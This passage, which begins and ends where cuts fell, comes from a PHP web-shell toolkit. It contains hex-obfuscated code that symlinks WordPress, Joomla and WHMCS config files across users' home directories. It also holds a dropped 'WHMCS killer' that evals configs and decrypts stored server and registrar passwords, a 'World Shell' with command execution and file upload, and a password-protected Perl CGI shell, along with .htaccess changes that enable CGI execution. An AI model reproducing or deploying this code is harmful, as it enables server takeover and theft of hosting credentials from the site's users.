</f\x6fn\x74\x3e</a>";echo"<\x75>$consym\x3c/\x75>";${${"\x47\x4cO\x42\x41\x4cS"}["\x63nk\x65\x63qb\x6d\x79\x67c"]}=explode("\n",$_POST["us\x65\x72"]);${$dlgbewtnr}=array("w\x70-\x63on\x66ig.p\x68\x70","\x77or\x64\x70r\x65\x73s/\x77\x70-\x63\x6fn\x66\x69g.\x70hp","\x63o\x6e\x66i\x67\x75ra\x74\x69on\x2ep\x68p","b\x6c\x6fg/\x77p-\x63on\x66\x69\x67.p\x68\x70","\x6aooml\x61/c\x6fn\x66i\x67u\x72a\x74\x69on\x2ephp","s\x69\x74e/w\x70-con\x66\x69g\x2ep\x68\x70","sit\x65/conf\x69g\x75\x72\x61t\x69\x6fn.\x70hp","\x63\x6d\x73/co\x6ef\x69\x67\x75\x72\x61t\x69\x6f\x6e.ph\x70","\x76b/i\x6ec\x6cu\x64e\x73/\x63on\x66i\x67\x2ep\x68p","\x69\x6e\x63l\x75\x64\x65s/c\x6fnfig\x2e\x70hp","co\x6e\x66_\x67l\x6fb\x61l\x2ep\x68\x70","in\x63/c\x6f\x6ef\x69\x67\x2e\x70\x68p","c\x6fn\x66i\x67\x2e\x70hp","\x53e\x74t\x69n\x67\x73\x2eph\x70","\x73ite\x73/\x64\x65\x66au\x6c\x74/\x73ett\x69\x6e\x67\x73.\x70\x68p","\x77h\x6d/\x63o\x6efig\x75\x72\x61t\x69on\x2ep\x68p","w\x68m\x63s/\x63on\x66\x69\x67u\x72ati\x6f\x6e.ph\x70","\x73u\x70p\x6fr\x74/\x63o\x6efig\x75\x72ati\x6f\x6e.ph\x70","w\x68\x6dc/\x57\x48M/co\x6e\x66\x69g\x75\x72\x61\x74\x69on\x2e\x70\x68\x70","w\x68\x6d/W\x48\x4d\x43\x53/con\x66i\x67u\x72\x61\x74\x69\x6fn.\x70h\x70","w\x68\x6d/\x77h\x6dc\x73/c\x6fn\x66\x69gu\x72\x61t\x69\x6f\x6e\x2ep\x68\x70","\x73\x75p\x70ort/c\x6fn\x66\x69gu\x72\x61\x74\x69\x6f\x6e.php","cli\x65\x6e\x74\x73/\x63o\x6ef\x69\x67ur\x61tion.php","\x63lien\x74/\x63\x6f\x6efi\x67\x75\x72at\x69\x6fn\x2e\x70\x68p","\x63li\x65\x6e\x74\x65s/con\x66\x69\x67\x75ra\x74\x69\x6fn\x2e\x70\x68\x70","c\x6cien\x74e/\x63onf\x69gu\x72\x61t\x69\x6f\x6e.php","c\x6cient\x73\x75p\x70ort/c\x6f\x6efi\x67\x75r\x61\x74i\x6f\x6e.\x70\x68\x70","b\x69\x6c\x6c\x69\x6eg/\x63o\x6efig\x75\x72at\x69on\x2ep\x68\x70","\x61\x64m\x69\x6e/\x63\x6fnfi\x67.ph\x70","ad\x6d/\x63\x6fn\x66\x69\x67.\x70\x68\x70","\x63\x6d\x73/\x63\x6f\x6efig\x2e\x70\x68\x70");foreach(${${"\x47\x4c\x4f\x42A\x4cS"}["\x77\x75g\x76\x7a\x79\x79t"]} as${${"\x47\x4c\x4f\x42\x41LS"}["\x71\x6atz\x78h\x62\x68\x6ai"]}){${"\x47\x4c\x4fBAL\x53"}["i\x73\x77p\x6f\x73qb"]="u\x73";$yvpiosvhexz="\x75\x73\x73";${${"\x47LO\x42A\x4cS"}["\x69\x73wp\x6fsq\x62"]}=trim(${$yvpiosvhexz});foreach(${${"G\x4c\x4f\x42A\x4c\x53"}["\x78\x73s\x75\x6b\x65\x74\x68lx"]} as${${"\x47\x4cOBAL\x53"}["fy\x67\x66\x77\x66pp"]}){${"\x47\x4cOB\x41\x4cS"}["ebyga\x70\x76\x7a"]="c";${"G\x4c\x4fB\x41\x4c\x53"}["\x64\x79\x78w\x77\x62\x68d\x7a\x68b"]="\x72";${"\x47\x4cO\x42A\x4c\x53"}["y\x65s\x6dndg\x63s"]="u\x73";${"G\x4c\x4fBA\x4c\x53"}["\x70\x68\x69\x78rrg\x76\x71v\x6b"]="\x72\x73";${${"G\x4cOB\x41\x4cS"}["\x70h\x69\x78\x72\x72g\x76\x71\x76\x6b"]}="/h\x6fme/".${${"G\x4cO\x42A\x4cS"}["\x79esmn\x64g\x63\x73"]}."/\x70\x75\x62\x6ci\x63\x5f\x68t\x6dl/".${${"\x47\x4cO\x42A\x4c\x53"}["\x66\x79\x67\x66\x77\x66\x70\x70"]};${"\x47\x4cOB\x41\x4c\x53"}["\x6a\x67\x70\x74t\x73td\x6am"]="\x72s";${${"\x47\x4cO\x42\x41\x4c\x53"}["\x75\x75\x6f\x65\x6c\x64\x6c\x68\x6e"]}="B\x54/".${${"\x47\x4cO\x42A\x4c\x53"}["ytqsi\x64\x62\x75\x77\x62"]}."\x20\x2e.\x20".${${"\x47\x4cO\x42\x41L\x53"}["e\x62y\x67ap\x76z"]};symlink(${${"\x47\x4cO\x42\x41\x4c\x53"}["j\x67\x70\x74\x74\x73\x74d\x6a\x6d"]},${${"G\x4c\x4f\x42AL\x53"}["\x64\x79\x78\x77\x77\x62\x68\x64\x7a\x68\x62"]});}}}
?>'; file_put_contents("dir.php", base64_decode($TraidntUpload));; echo "

dir.php


"; } elseif($_POST[scan]=='4Images') { $images4 = '<?php

###########################################
#      WHMCS Server Password decoder       #
#      Coded By RAB3OUN                    #
#          v.b-4@hotmail.com               #
#Note : I'm Proud to be ~~TUNISIAN~~       #  
###########################################



function decrypt ($string,$cc_encryption_hash)
{

    $key = md5 (md5 ($cc_encryption_hash)) . md5 ($cc_encryption_hash);
    $hash_key = _hash ($key);
    $hash_length = strlen ($hash_key);
    $string = base64_decode ($string);
    $tmp_iv = substr ($string, 0, $hash_length);
    $string = substr ($string, $hash_length, strlen ($string) - $hash_length);
    $iv = $out = '';
    $c = 0;
    while ($c < $hash_length)
    {
        $iv .= chr (ord ($tmp_iv[$c]) ^ ord ($hash_key[$c]));
        ++$c;
    }

    $key = $iv;
    $c = 0;
    while ($c < strlen ($string))
    {
        if (($c != 0 AND $c % $hash_length == 0))
        {
            $key = _hash ($key . substr ($out, $c - $hash_length, $hash_length));
        }

        $out .= chr (ord ($key[$c % $hash_length]) ^ ord ($string[$c]));
        ++$c;
    }

    return $out;
}


function _hash ($string)
{
    if (function_exists ('sha1'))
    {
        $hash = sha1 ($string);
    }
    else
    {
        $hash = md5 ($string);
    }

    $out = '';
    $c = 0;
    while ($c < strlen ($hash))
    {
        $out .= chr (hexdec ($hash[$c] . $hash[$c + 1]));
        $c += 2;
    }

    return $out;
}

 if($_POST['form_action'] == 1 )
 {
 //include($file);

 $file=($_POST['file']);
$text=file_get_contents($file);

$text= str_replace("<?php", "", $text);
$text= str_replace("<?", "", $text);
$text= str_replace("?>", "", $text);

eval($text);

    $link=mysql_connect($db_host,$db_username,$db_password) ;
        mysql_select_db($db_name,$link) ;

$query = mysql_query("SELECT * FROM tblservers");

while($v = mysql_fetch_array($query)) {

$ipaddress = $v['ipaddress'];
$username = $v['username'];
$type = $v['type'];
$active = $v['active'];
$hostname = $v['hostname'];

echo("<center><table border='1'>");
$password = decrypt ($v['password'], $cc_encryption_hash);
echo("<tr><td>Type</td><td>$type</td></tr>");
echo("<tr><td>Active</td><td>$active</td></tr>");
echo("<tr><td>Hostname</td><td>$hostname</td></tr>");
echo("<tr><td>Ip</td><td>$ipaddress</td></tr>");
echo("<tr><td>Username</td><td>$username</td></tr>");
echo("<tr><td>Password</td><td>$password</td></tr>");


echo "</table><br><br></center>";

}

    $link=mysql_connect($db_host,$db_username,$db_password) ;
        mysql_select_db($db_name,$link) ;

$query = mysql_query("SELECT * FROM tblregistrars");
echo("<center>Domain Reseller <br><table border='1'>");
echo("<tr><td>Registrar</td><td>Setting</td><td>Value</td></tr>");
while($v = mysql_fetch_array($query)) {

$registrar     = $v['registrar'];
$setting = $v['setting'];
$value = decrypt ($v['value'], $cc_encryption_hash);
if ($value=="") {
$value=0;
}
$password = decrypt ($v['password'], $cc_encryption_hash);
echo("<tr><td>$registrar</td><td>$setting</td><td>$value</td></tr>");





}
echo "</table><br><br></center>";
}



 if($_POST['form_action'] == 2 )
 {
 //include($file);

 $db_host=($_POST['db_host']);
 $db_username=($_POST['db_username']);
 $db_password=($_POST['db_password']);
 $db_name=($_POST['db_name']);
 $cc_encryption_hash=($_POST['cc_encryption_hash']);




    $link=mysql_connect($db_host,$db_username,$db_password) ;
        mysql_select_db($db_name,$link) ;

$query = mysql_query("SELECT * FROM tblservers");

while($v = mysql_fetch_array($query)) {

$ipaddress = $v['ipaddress'];
$username = $v['username'];
$type = $v['type'];
$active = $v['active'];
$hostname = $v['hostname'];

echo("<center><table border='1'>");
$password = decrypt ($v['password'], $cc_encryption_hash);
echo("<tr><td>Type</td><td>$type</td></tr>");
echo("<tr><td>Active</td><td>$active</td></tr>");
echo("<tr><td>Hostname</td><td>$hostname</td></tr>");
echo("<tr><td>Ip</td><td>$ipaddress</td></tr>");
echo("<tr><td>Username</td><td>$username</td></tr>");
echo("<tr><td>Password</td><td>$password</td></tr>");


echo "</table><br><br></center>";

}


    $link=mysql_connect($db_host,$db_username,$db_password) ;
        mysql_select_db($db_name,$link) ;

$query = mysql_query("SELECT * FROM tblregistrars");
echo("<center>Domain Reseller <br><table border='1'>");
echo("<tr><td>Registrar</td><td>Setting</td><td>Value</td></tr>");
while($v = mysql_fetch_array($query)) {

$registrar     = $v['registrar'];
$setting = $v['setting'];
$value = decrypt ($v['value'], $cc_encryption_hash);
if ($value=="") {
$value=0;
}
$password = decrypt ($v['password'], $cc_encryption_hash);
echo("<tr><td>$registrar</td><td>$setting</td><td>$value</td></tr>");





}
echo "</table><br><br></center>";
}




?><body bgcolor="#000000">
 <style>

BODY { SCROLLBAR-BASE-COLOR: #191919; SCROLLBAR-ARROW-COLOR: olive;   color: white;}
textarea{background-color:#191919;color:red;font-weight:bold;font-size: 12px;font-family: Tahoma; border: 1px solid #666666;}
input{FONT-WEIGHT:normal;background-color: #191919;font-size: 13px;font-weight:bold;color: red; font-family: Tahoma; border: 1px solid #666666;height:17}
</style>
<center>
<font color="#FFFF6FF" size='+3'>[ ~~ WHMCS Server Password decoder ~~ ]</font><br><br>
<font color="#0066FF" size='+2'>Symlink to configuration.php of WHMCS</font><br>
</center>
<FORM action=""  method="post">
<input type="hidden" name="form_action" value="1">
<br>
 <input type="text" size="30" name="file" value="">
<br>
<INPUT class=submit type="submit" value="Submit" name="Submit">
</FORM>
<hr>

<br>
<center>
<font color="#0066FF" size='+2'>DB configuration of WHMCS</font><br>
</center>
<FORM action=""  method="post">
<input type="hidden" name="form_action" value="2">
<br>
<table border=1>

<tr><td>db_host </td><td><input type="text" size="30" name="db_host" value="localhost"></td></tr>
<tr><td>db_username </td><td><input type="text" size="30" name="db_username" value=""></td></tr>
<tr><td>db_password</td><td><input type="text" size="30" name="db_password" value=""></td></tr>
<tr><td>db_name</td><td><input type="text" size="30" name="db_name" value=""><td></tr>
<tr><td>cc_encryption_hash</td><td><input type="text" size="30" name="cc_encryption_hash" value=""></td></tr>

</table>
<br>
<INPUT class=submit type="submit" value="Submit" name="Submit">
</FORM>
<hr>
<center>
<font color="#0066FF" size='+2'>Password decoder</font><br>
<?
 if($_POST['form_action'] == 3 )
 {



 $password=($_POST['password']);

 $cc_encryption_hash=($_POST['cc_encryption_hash']);


$password = decrypt ($password, $cc_encryption_hash);

echo("Password is ".$password);

}
?>
</center>
<FORM action=""  method="post">
<input type="hidden" name="form_action" value="3">
<br>
<table border=1>

<tr><td>Password</td><td><input type="text" size="30" name="password" value=""></td></tr>
<tr><td>cc_encryption_hash</td><td><input type="text" size="30" name="cc_encryption_hash" value=""></td></tr>

</table>
<br>
<INPUT class=submit type="submit" value="Submit" name="Submit">
</FORM>
<hr>


  <center> <font color="#FFFF6FF" size='+1'>   Coded By RAB3OUN v.b-4@hotmail.com    </font><br><br> <center>
'; file_put_contents("Whmcs.php",base64_decode($images4));; echo "

Whmcs killer


"; } elseif($_POST[scan]=='Joomla') { $joomlaBrute = '<?php
 $head = '
<html>
<head>
</script>
<title>World Shell</title>
<meta http-equiv="Content-Type" content="text/html; charset=UTF-8">

<STYLE>
@import url(http://fonts.googleapis.com/css?family=Open+Sans+Condensed:700);
body {
font-family: Tahoma
}
tr {
BORDER: dashed 3px #333;
color: #FFF;
}
td {
BORDER: dashed 1px #333;
color: #FFF;
}
.table1 {
BORDER: 0px Black;
BACKGROUND-COLOR: Black;
color: #FFF;
}
.td1 {
BORDER: 0px;
BORDER-COLOR: #333333;
font: 7pt Verdana;
color: Green;
}
.tr1 {
BORDER: 0px;
BORDER-COLOR: #333333;
color: #FFF;
}
table {
border-style:dotted solid;
BORDER-COLOR: #333333;
BACKGROUND-COLOR: Black;
color: #FFF;
}
input {
border			: dashed 2px;
border-color		: #333;
BACKGROUND-COLOR: Black;
font: 8pt Verdana;
color: Red;
}
select {
BORDER-RIGHT:  Black 1px solid;
BORDER-TOP:    #DF0000 1px solid;
BORDER-LEFT:   #DF0000 1px solid;
BORDER-BOTTOM: Black 1px solid;
BORDER-color: #FFF;
BACKGROUND-COLOR: Black;
font: 8pt Verdana;
color: Red;
}
submit {
BORDER:  buttonhighlight 2px outset;
BACKGROUND-COLOR: Black;
width: 40%;
color: white;
}
textarea {
border			: dashed 3px #333;
BACKGROUND-COLOR: Black;
font: Fixedsys bold;
color: #999;
}
BODY {
	SCROLLBAR-FACE-COLOR: Black; SCROLLBAR-HIGHLIGHT-color: #FFF; SCROLLBAR-SHADOW-color: #FFF; SCROLLBAR-3DLIGHT-color: #FFF; SCROLLBAR-ARROW-COLOR: Black; SCROLLBAR-TRACK-color: #FFF; SCROLLBAR-DARKSHADOW-color: #FFF
margin: 1px;
color: Red;
background-color: Black;
}
.main {
margin			: -287px 0px 0px -490px;
BORDER: dashed 3px #333;
BORDER-COLOR: #333333;
}
.tt {
background-color: Black;
}

A:link {
	COLOR: White; TEXT-DECORATION: none
}
A:visited {
	COLOR: White; TEXT-DECORATION: none
}
A:hover {
	color: Red; TEXT-DECORATION: none
}
A:active {
	color: Red; TEXT-DECORATION: none
}
</STYLE>
<script language=\'javascript\'>
function hide_div(id)
{
  document.getElementById(id).style.display = \'none\';
  document.cookie=id+\'=0;\';
}
function show_div(id)
{
  document.getElementById(id).style.display = \'block\';
  document.cookie=id+\'=1;\';
}
function change_divst(id)
{
  if (document.getElementById(id).style.display == \'none\')
    show_div(id);
  else
    hide_div(id);
}
</script>'; ?>
<html>
	<head>
		<?php
		echo $head ;
		echo '

<table width="100%" cellspacing="0" cellpadding="0" class="tb1" >



       <td width="100%" align=center valign="top" rowspan="1">
           <font color=red size=5 face="Open Sans Condensed"><b>--==[[ W</font><font color=white size=5 face="Open Sans Condensed"><b>orld-Hacker.org</font><font color=green size=5 face="Open Sans Condensed"><b> Shell ]]==--</font> <div class="hedr">

        <td height="10" align="left" class="td1"></td></tr><tr><td
        width="100%" align="center" valign="top" rowspan="1"><font
        color="red" face="Open Sans Condensed"size="1"><b>
        <font color=red>
        ############################################</font><font color=white>############################################</font><font color=green>############################################</font><br><font color=white>-==[[ World-Hacker.Org ]]==--</font><br>M@rAz Ali & Peyman Siyahi<br>

<font color=white>--==[[ Mail ]]==--</font>
<br># Maraz.BlackHat@gmail.com #<br><font color=white>--==[[ Tnx ]]==--</font><br><font color=red>iliya norton & Saeed210 & Milad Hacking</font><br><font color=red>
        ############################################</font><font color=white>############################################</font><font color=green>############################################</font>
						</a>
           </table>


';
?>

</head>

<body bgcolor="black"><body bgcolor="black">

	<table border=1 width=100%><td width=15% align=right><font color=red size=-2 face="Open Sans Condensed">uname<br>server_ip<br>your_ip<br>server_software<br>disabled_functions</td><td><?php echo "<font size=-2>".php_uname()  ;?>	<br><?php echo "<font size=-2>".gethostbyname($_SERVER["HTTP_HOST"]);?><br><?php echo $_SERVER['REMOTE_ADDR'];?><br><?php echo $s_software = getenv("SERVER_SOFTWARE"); ?><br><?php $r=ini_get('disable_functions') ? ini_get('disable_functions'):'none'; echo $r;?>
	</table><?php echo $head ; ?><table width=100% ><tr><td align=center width=60% >



<?php

	if(!isset($_POST['sbexe']))
	{

							?>
						<textarea  name=output cols="100" rows="10" ><?php
						$r="ls -la";
						echo shell_exec($r); ?></textarea>
						<?php

				}

				else
				{

					if(isset($_POST['sbexe']))
	{
		echo "<font size=3>";
	$cmde=$_POST["cmex"];
	?><textarea  name=output cols="100" rows="10" ><?php echo shell_exec($cmde); ?></textarea>
	<?php
} }
?>

<tr><td  align=center><font color=white size=3 face="Open Sans Condensed">--==[[command
	execution]]==--</font></font><form method=POST>

	<input type name=cmex >
	<input type=submit name=sbexe value='hex it' /></form>
	</td></tr>


	</table><table border=1 width=100%> <tr><td align=center><br><?php

echo '<form action="" method="post" enctype="multipart/form-data" name="uploader" id="uploader">';
echo '<input type="file" name="file" size="50">&nbsp&nbsp&nbsp&nbsp<input  type="submit"  name="sut" value="Upload"></form>';
if( isset($_POST['sut']) )
 {
	  	if(@copy($_FILES['file']['tmp_name'], $_FILES['file']['name']))
	  	 { echo '<font color=red size=-2 face="Open Sans Condensed">upload done<<br><br>'; }
	  	 else { echo '<font color=red size=-2 face="Open Sans Condensed">Upload failed :P<br>'; } }


?></table></table></table>

<table width=100%>
<td align=center><a href="<?php echo "?CGI" ; ?>"><font color=white size=3 face="Open Sans Condensed"><b>--==[[---0---<font color=red size=2 face="Open Sans Condensed">CGI Telnet</font><font color=white size=2 face="Open Sans Condensed">----0---]]==--</a></table>
<?php
if(isset($_GET['CGI']))
{
error_reporting(0);

mkdir('i', 0777);
        $hope = fopen("i/.htaccess", 'w');
        $hcon= "Options FollowSymLinks MultiViews Indexes ExecCGI\nAddType application/x-httpd-cgi .root\nAddHandler cgi-script .root\nAddHandler cgi-script .root";
        fwrite ( $hope, $hcon ) ;

$telnet='#!/usr/bin/perl -I/usr/local/bandmain
#------------------------------------------------------------------------------
# <b style="color:black;background-color:red">cgi shell</b> # server
#------------------------------------------------------------------------------

#------------------------------------------------------------------------------
# Configuration: You need to change only $Password and $WinNT. The other
# values should work fine for most systems.
#------------------------------------------------------------------------------
$Password = "worldtool";	 # Change this. You will need to enter this
# to login.

$WinNT = 0;	 # You need to change the value of this to 1 if
# you're running this script on a Windows NT
# machine. If you're running it on Unix, you
# can leave the value as it is.

$NTCmdSep = "&";	 # This character is used to seperate 2 commands
# in a command line on Windows NT.

$UnixCmdSep = ";";	 # This character is used to seperate 2 commands
# in a command line on Unix.

$CommandTimeoutDuration = 10;	# Time in seconds after commands will be killed
# Don't set this to a very large value. This is
# useful for commands that may hang or that
# take very long to execute, like "find /".
# This is valid only on Unix servers. It is
# ignored on NT Servers.

$ShowDynamicOutput = 1;	 # If this is 1, then data is sent to the
# browser as soon as it is output, otherwise
# it is buffered and send when the command
# completes. This is useful for commands like
# ping, so that you can see the output as it
# is being generated.

# DON'T CHANGE ANYTHING BELOW THIS LINE UNLESS YOU KNOW WHAT YOU'RE DOING !!

$CmdSep = ($WinNT ? $NTCmdSep : $UnixCmdSep);
$CmdPwd = ($WinNT ? "cd" : "pwd");
$PathSep = ($WinNT ? "\\" : "/");
$Redirector = ($WinNT ? " 2>&1 1>&2" : " 1>&1 2>&1");

#------------------------------------------------------------------------------
# Reads the input sent by the browser and parses the input variables. It
# parses GET, POST and multipart/form-data that is used for uploading files.
# The filename is stored in $in{'f'} and the data is stored in $in{'filedata'}.
# Other variables can be accessed using $in{'var'}, where var is the name of
# the variable. Note: Most of the code in this function is taken from other CGI
# scripts.
#------------------------------------------------------------------------------
sub ReadParse 
{
local (*in) = @_ if @_;
local ($i, $loc, $key, $val);

$MultipartFormData = $ENV{'CONTENT_TYPE'} =~ /multipart\/form-data; boundary=(.+)$/;

if($ENV{'REQUEST_METHOD'} eq "GET")
{
$in = $ENV{'QUERY_STRING'};
}
elsif($ENV{'REQUEST_METHOD'} eq "POST")
{
binmode(STDIN) if $MultipartFormData & $WinNT;
read(STDIN, $in, $ENV{'CONTENT_LENGTH'});
}

# handle file upload data
if($ENV{'CONTENT_TYPE'} =~ /multipart\/form-data; boundary=(.+)$/)
{
$Boundary = '--'.$1; # please refer to RFC1867 
@list = split(/$Boundary/, $in); 
$HeaderBody = $list[1];
$HeaderBody =~ /\r\n\r\n|\n\n/;
$Header = $`;
$Body = $';
$Body =~ s/\r\n$//; # the last \r\n was put in by Netscape
$in{'filedata'} = $Body;
$Header =~ /filename=\"(.+)\"/; 
$in{'f'} = $1; 
$in{'f'} =~ s/\"//g;
$in{'f'} =~ s/\s//g;

# parse trailer
for($i=2; $list[$i]; $i++)
{ 
$list[$i] =~ s/^.+name=$//;
$list[$i] =~ /\"(\w+)\"/;
$key = $1;
$val = $';
$val =~ s/(^(\r\n\r\n|\n\n))|(\r\n$|\n$)//g;
$val =~ s/%(..)/pack("c", hex($1))/ge;
$in{$key} = $val; 
}
}
else # standard post data (url encoded, not multipart)
{
@in = split(/&/, $in);
foreach $i (0 .. $#in)
{
$in[$i] =~ s/\+/ /g;
($key, $val) = split(/=/, $in[$i], 2);
$key =~ s/%(..)/pack("c", hex($1))/ge;
$val =~ s/%(..)/pack("c", hex($1))/ge;
$in{$key} .= "\0" if (defined($in{$key}));
$in{$key} .= $val;
}
}
}

#------------------------------------------------------------------------------
# Prints the HTML Page Header
# Argument 1: Form item name to which focus should be set
#------------------------------------------------------------------------------
sub PrintPageHeader
{
$EncodedCurrentDir = $CurrentDir;
$EncodedCurrentDir =~ s/([^a-zA-Z0-9])/'%'.unpack("H*",$1)/eg;
print "Content-type: text/html\n\n";
print <<END;
<html>
<head>

$HtmlMetaHeader

</head>
<body onLoad="document.f.@_.focus()" bgcolor="black" topmargin="0" leftmargin="0" marginwidth="0" marginheight="0" text="#FF0000">
<br><div align=center><table style="border: 2px dashed red"><tr><td align=center><b><font color=white size=2>
<font color=white size=3> Connected to $ServerName</b></font><br>

<a href="$ScriptLocation?a=upload&d=$EncodedCurrentDir"><font color="#FF0000">Upload File</font></a> | 
<a href="$ScriptLocation?a=download&d=$EncodedCurrentDir"><font color="#FF0000">Download File</font></a> |
<a href="$ScriptLocation?a=logout"><font color="#FF0000">Disconnect</font></a> |
</font>
</table>

END
}

#------------------------------------------------------------------------------
# Prints the Login Screen
#------------------------------------------------------------------------------
sub PrintLoginScreen
{
$Message = q$<h2 style="text-align:center"><img border="0" src="http://rozup.ir/up/nootepad/123456/logo.png"><br><font size=3 color=white face="comic sans ms">--==[[ Cgi Shell By World Hacker Team ]]==--<br>Password: worldtool</font>
$;
#'
print <<END;
<code>$Message
END
}

#------------------------------------------------------------------------------
# Prints the message that informs the user of a failed login
#------------------------------------------------------------------------------
sub PrintLoginFailedMessage
{
print <<END;
<code>
<br>login: admin<br>
password: worldtool !<br>
Login incorrect<br><br>
</code>
END
}

#------------------------------------------------------------------------------
# Prints the HTML form for logging in
#------------------------------------------------------------------------------
sub PrintLoginForm
{
print <<END;
<code>

<form name="f" method="POST" action="$ScriptLocation">
<input type="hidden" name="a" value="login">
<font size="3">

password:</font><font color="#009900" size="3"><input type="password" name="p">
<br><input type="submit" value="spin this shit">
</form>
</code>
END
}

#------------------------------------------------------------------------------
# Prints the footer for the HTML Page
#------------------------------------------------------------------------------
sub PrintPageFooter
{
print "</font></body></html>";
}

#------------------------------------------------------------------------------
# Retreives the values of all cookies. The cookies can be accesses using the
# variable $Cookies{''}
#------------------------------------------------------------------------------
sub GetCookies
{
@httpcookies = split(/; /,$ENV{'HTTP_COOKIE'});
foreach $cookie(@httpcookies)
{
($id, $val) = split(/=/, $cookie);
$Cookies{$id} = $val;
}
}

#------------------------------------------------------------------------------
# Prints the screen when the user logs out
#------------------------------------------------------------------------------
sub PrintLogoutScreen
{
print "<code>Connection closed by foreign host.<br><br></code>";
}

#------------------------------------------------------------------------------
# Logs out the user and allows the user to login again
#------------------------------------------------------------------------------
sub PerformLogout
{
print "Set-Cookie: SAVEDPWD=;\n"; # remove password cookie
&PrintPageHeader("p");
&PrintLogoutScreen;

&PrintLoginScreen;
&PrintLoginForm;
&PrintPageFooter;
}

#------------------------------------------------------------------------------
# This function is called to login the user. If the password matches, it
# displays a page that allows the user to run commands. If the password doens't
# match or if no password is entered, it displays a form that allows the user
# to login
#------------------------------------------------------------------------------
sub PerformLogin 
{
if($LoginPassword eq $Password) # password matched
{
print "Set-Cookie: SAVEDPWD=$LoginPassword;\n";
&PrintPageHeader("c");
&PrintCommandLineInputForm;
&PrintPageFooter;
}
else # password didn't match
{
&PrintPageHeader("p");
&PrintLoginScreen;
if($LoginPassword ne "") # some password was entered
{
&PrintLoginFailedMessage;

}
&PrintLoginForm;
&PrintPageFooter;
}
}

#------------------------------------------------------------------------------
# Prints the HTML form that allows the user to enter commands
#------------------------------------------------------------------------------
sub PrintCommandLineInputForm
{
$Prompt = $WinNT ? "$CurrentDir> " : "[admin\@$ServerName $CurrentDir]\$ ";
print <<END;
<code>
<form name="f" method="POST" action="$ScriptLocation">
<input type="hidden" name="a" value="command">
<input type="hidden" name="d" value="$CurrentDir">
$Prompt
<input type="text" name="c">
<input type="submit" value="Enter">
</form>
</code>

END
}

#------------------------------------------------------------------------------
# Prints the HTML form that allows the user to download files
#------------------------------------------------------------------------------
sub PrintFileDownloadForm
{
$Prompt = $WinNT ? "$CurrentDir> " : "[admin\@$ServerName $CurrentDir]\$ ";
print <<END;
<code>
<form name="f" method="POST" action="$ScriptLocation">
<input type="hidden" name="d" value="$CurrentDir">
<input type="hidden" name="a" value="download">
$Prompt download<br><br>
Filename: <input type="text" name="f" size="35"><br><br>
Download: <input type="submit" value="Begin">
</form>
</code>
END
}

#------------------------------------------------------------------------------
# Prints the HTML form that allows the user to upload files
#------------------------------------------------------------------------------
sub PrintFileUploadForm
{
$Prompt = $WinNT ? "$CurrentDir> " : "[admin\@$ServerName $CurrentDir]\$ ";
print <<END;
<code>

<form name="f" enctype="multipart/form-data" method="POST" action="$ScriptLocation">
$Prompt upload<br><br>
Filename: <input type="file" name="f" size="35"><br><br>
Options: &nbsp;<input type="checkbox" name="o" value="overwrite">
Overwrite if it Exists<br><br>
Upload:&nbsp;&nbsp;&nbsp;<input type="submit" value="Begin">
<input type="hidden" name="d" value="$CurrentDir">
<input type="hidden" name="a" value="upload">
</form>
</code>
END
}

#------------------------------------------------------------------------------
# This function is called when the timeout for a command expires. We need to
# terminate the script immediately. This function is valid only on Unix. It is
# never called when the script is running on NT.
#------------------------------------------------------------------------------
sub CommandTimeout
{
if(!$WinNT)
{
alarm(0);
print <<END;
</xmp>

<code>
Command exceeded maximum time of $CommandTimeoutDuration second(s).
<br>Killed it!
END
&PrintCommandLineInputForm;
&PrintPageFooter;
exit;
}
}

#------------------------------------------------------------------------------
# This function is called to execute commands. It displays the output of the
# command and allows the user to enter another command. The change directory
# command is handled differently. In this case, the new directory is stored in
# an internal variable and is used each time a command has to be executed. The
# output of the change directory command is not displayed to the users
# therefore error messages cannot be displayed.
#------------------------------------------------------------------------------
sub ExecuteCommand
{
if($RunCommand =~ m/^\s*cd\s+(.+)/) # it is a change dir command
{
# we change the directory internally. The output of the
# command is not displayed.

$OldDir = $CurrentDir;
$Command = "cd \"$CurrentDir\"".$CmdSep."cd $1".$CmdSep.$CmdPwd;
chop($CurrentDir = `$Command`);
&PrintPageHeader("c");
$Prompt = $WinNT ? "$OldDir> " : "[admin\@$ServerName $OldDir]\$ ";
print "$Prompt $RunCommand";
}
else # some other command, display the output
{
&PrintPageHeader("c");
$Prompt = $WinNT ? "$CurrentDir> " : "[admin\@$ServerName $CurrentDir]\$ ";
print "$Prompt $RunCommand<xmp>";
$Command = "cd \"$CurrentDir\"".$CmdSep.$RunCommand.$Redirector;
if(!$WinNT)
{
$SIG{'ALRM'} = \&CommandTimeout;
alarm($CommandTimeoutDuration);
}
if($ShowDynamicOutput) # show output as it is generated
{
$|=1;
$Command .= " |";
open(CommandOutput, $Command);
while(<CommandOutput>)
{
$_ =~ s/(\n|\r\n)$//;
print "$_\n";
}
$|=0;
}
else # show output after command completes
{
print `$Command`;
}
if(!$WinNT)
{
alarm(0);
}
print "</xmp>";
}
&PrintCommandLineInputForm;
&PrintPageFooter;
}

#------------------------------------------------------------------------------
# This function displays the page that contains a link which allows the user
# to download the specified file. The page also contains a auto-refresh
# feature that starts the download automatically.
# Argument 1: Fully qualified filename of the file to be downloaded
#------------------------------------------------------------------------------
sub PrintDownloadLinkPage
{
local($FileUrl) = @_;
if(-e $FileUrl) # if the file exists
{
# encode the file link so we can send it to the browser
$FileUrl =~ s/([^a-zA-Z0-9])/'%'.unpack("H*",$1)/eg;
$DownloadLink = "$ScriptLocation?a=download&f=$FileUrl&o=go";
$HtmlMetaHeader = "<meta HTTP-EQUIV=\"Refresh\" CONTENT=\"1; URL=$DownloadLink\">";
&PrintPageHeader("c");
print <<END;
<code>

Sending File $TransferFile...<br>
If the download does not start automatically,
<a href="$DownloadLink">Click Here</a>.
END
&PrintCommandLineInputForm;
&PrintPageFooter;
}
else # file doesn't exist
{
&PrintPageHeader("f");
print "Failed to download $FileUrl: $!";
&PrintFileDownloadForm;
&PrintPageFooter;
}
}

#------------------------------------------------------------------------------
# This function reads the specified file from the disk and sends it to the
# browser, so that it can be downloaded by the user.
# Argument 1: Fully qualified pathname of the file to be sent.
#------------------------------------------------------------------------------
sub SendFileToBrowser
{
local($SendFile) = @_;
if(open(SENDFILE, $SendFile)) # file opened for reading
{
if($WinNT)
{
binmode(SENDFILE);
binmode(STDOUT);
}
$FileSize = (stat($SendFile))[7];
($Filename = $SendFile) =~ m!([^/^\\]*)$!;
print "Content-Type: application/x-unknown\n";
print "Content-Length: $FileSize\n";
print "Content-Disposition: attachment; filename=$1\n\n";
print while(<SENDFILE>);
close(SENDFILE);
}
